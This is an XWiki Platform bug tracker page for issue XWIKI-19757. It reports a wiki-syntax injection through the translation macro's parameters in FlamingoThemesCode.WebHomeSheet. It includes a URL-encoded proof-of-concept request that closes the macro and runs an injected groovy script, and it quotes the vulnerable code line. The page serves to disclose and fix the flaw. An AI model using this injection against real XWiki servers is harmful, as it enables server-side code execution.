Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-19757

Possible wiki injection through translation macro parameters located in FlamingoThemesCode.WebHomeSheet

    XMLWordPrintable

Details

    • Unit
    • High
    • Unknown
    • N/A
    • N/A

    Description

      To reproduce:

      http://127.0.0.1:8080/xwiki/bin/view/FlamingoThemesCode/WebHomeSheet?newThemeName=foo%22%2F%7D%7D%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22hello%20from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D&form_token=1&action=create

      This actually execute a groovy macro injected in the URL as part of the error message that was supposed to print the theme name.

      That page contains the following code (executed when passing an invalid form token):

      {{translation key="platform.flamingo.themes.home.create.csrf" parameters="$request.newThemeName" /}}
      

      This makes it possible to inject any wiki content by providing a value which close the translation macro and start anything else.

      Attachments

        Issue Links

          Activity

            People

              mleduc Manuel Leduc
              tmortagne Thomas Mortagne
              Votes:
              0 Vote for this issue
              Watchers:
              1 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: